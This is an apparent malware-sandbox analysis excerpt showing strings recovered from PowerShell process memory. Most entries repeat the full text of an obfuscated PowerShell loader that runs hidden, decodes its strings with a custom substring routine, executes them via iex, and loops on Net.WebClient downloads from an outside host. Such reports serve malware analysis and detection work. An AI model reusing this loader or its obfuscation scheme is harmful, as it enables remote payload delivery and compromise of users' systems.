,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshil
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: skolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg u
              Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBa
              Source: powershell.exe, 00000005.00000002.2205456986.0000000008430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
              Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG
              Source: powershell.exe, 00000002.00000002.2485251498.0000020B74913000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt
              Source: powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196941349.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exeIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl 